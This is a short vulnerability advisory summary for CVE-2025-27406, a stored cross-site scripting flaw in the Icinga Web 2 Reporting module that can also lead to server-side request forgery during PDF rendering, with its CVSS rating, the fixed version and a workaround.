CVE-2025-27406

CVE-2025-27406 is a cross-site scripting (XSS) vulnerability, associated with CWE-79 and CWE-918, affecting the Icinga Reporting module, a central component for reporting functionality in the Icinga Web 2 monitoring web frontend and framework. The flaw exists in versions 0.10.0 through 1.0.2, where attackers can create templates that embed arbitrary JavaScript code.

Exploitation requires network access, high privileges (PR:H), user interaction (UI:R), and high attack complexity (AC:H), as indicated by the CVSS v3.1 base score of 7.6 with changed scope (S:C) and high impacts on confidentiality, integrity, and availability. A high-privileged attacker can set up a malicious template; if a victim previews it, the embedded JavaScript executes in the user's context, allowing actions on the user's behalf. If a report using the template is printed to PDF, the JavaScript executes in the context of the headless browser, potentially enabling server-side request forgery or other actions.

The issue is fixed in Icinga Reporting version 1.0.3. As a workaround, administrators should review all templates and remove any suspicious settings. Additional details are available in the module's release notes at https://github.com/Icinga/icingaweb2-module-reporting/releases/tag/v1.0.3 and the security advisory at https://github.com/Icinga/icingaweb2-module-reporting/security/advisories/GHSA-7qvq-54vm-r7hx.